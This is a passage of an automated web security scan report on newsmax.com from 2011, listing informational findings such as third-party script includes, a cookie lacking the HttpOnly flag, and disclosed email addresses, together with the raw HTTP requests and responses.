2.90. http://www.newsmax.com/hottopics/topic/Healthcare-Reform/103  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Healthcare-Reform/103

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Healthcare-Reform/103 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 40496
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.91. http://www.newsmax.com/hottopics/topic/Middle-East/82  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Middle-East/82

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Middle-East/82 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 40480
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.92. http://www.newsmax.com/hottopics/topic/Obama-Budget/137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Obama-Budget/137

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Obama-Budget/137 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 40189
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.93. http://www.newsmax.com/hottopics/topic/Public-Union/139  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Public-Union/139

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Public-Union/139 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 34734
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.94. http://www.newsmax.com/hottopics/topic/Tea-Party/111  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/Tea-Party/111

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/Tea-Party/111 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 40547
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.95. http://www.newsmax.com/hottopics/topic/WikiLeaks/133  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /hottopics/topic/WikiLeaks/133

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hottopics/topic/WikiLeaks/133 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 39256
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.96. http://www.newsmax.com/insidecover  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /insidecover

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /insidecover HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.97. http://www.newsmax.com/jokes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /jokes/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jokes/ HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 33577
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.98. http://www.newsmax.com/mainpop.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /mainpop.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mainpop.htm HTTP/1.1
Host: www.newsmax.com
Proxy-Connection: keep-alive
Referer: http://www.newsmax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSPreferredCulture=en-US; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; OAX=rcHW802EtDQACEFj; RMFD=011Q0wWCO103C6qe|O103C7r2; popunder=yes

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 17 Aug 2010 15:23:44 GMT
Accept-Ranges: bytes
ETag: "040e42d203ecb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:51:32 GMT
Content-Length: 676

<html>

<head>
<META HTTP-EQUIV="expires" CONTENT="Wed, 1 JAN 2000 12:00:00 GMT">

<title></title>
<base target="_blank">
</head>

<body marginheight="0" marginwidth="0" leftmargin="0" topmar
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

2.99. http://www.newsmax.com/newsfront  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /newsfront

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newsfront HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44394
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.100. http://www.newsmax.com/politics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /politics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /politics HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 60668
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.101. http://www.newsmax.com/rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /rss

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rss HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 127596
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.102. http://www.newsmax.com/thewire  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /thewire

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /thewire HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45406
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.103. http://www.newsmax.com/us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43855
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.104. http://www.newsmax.com/video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 55432
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</ul>

<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...

2.105. http://www.newsmax.com/washington-times/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /washington-times/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /washington-times/ HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 33748
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:10:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.newsmax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 76862
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: CMSPreferredCulture=en-US; expires=Mon, 19-Mar-2012 13:50:54 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0pfk0dqssxwuix45e50jl53z; path=/; HttpOnly
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:50:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...

4. Email addresses disclosed  previous  next
There are 14 instances of this issue:


4.1. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45723
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Condi
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
